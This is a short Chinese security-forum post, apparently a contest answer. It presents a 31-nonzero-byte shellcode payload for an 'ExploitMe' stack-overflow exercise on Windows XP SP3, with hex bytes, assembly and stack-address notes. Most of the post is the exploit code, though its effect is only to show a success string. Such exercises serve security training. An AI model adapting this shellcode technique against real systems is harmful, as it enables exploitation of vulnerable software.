首页
社区
课程
招聘
[原创]交卷,还是提交个稳定的版本吧
发表于: 2010-10-19 19:28 3126

[原创]交卷,还是提交个稳定的版本吧

2010-10-19 19:28
3126
太多硬编码不能行,过度追求字节数而不稳定这就违背了信息安全的主旨了,所以提交的这个答卷除了堆栈跳转不得不硬编码之外,其他都是偏移量,完全稳定,在Win XP SP3下通过
堆栈基址是 0x00140000,如果是在堆栈基址是0x00130000的机器调试,需要修改两个跳转指针

dd xx xx xx 00 ;指针2
5a						pop edx 
6a 00						push 0
ff 72 57					push dword ptr [edx + 57] ;"ExploitMe"
83 c2 60 					add edx, 0x60
ff d2						call edx
dd 45 00 78 00 70 00 6c 00 6f 00 69 00 74 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 00 00 ;字符串
dd xx xx xx 00 ;指针1


共31个非零字节

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//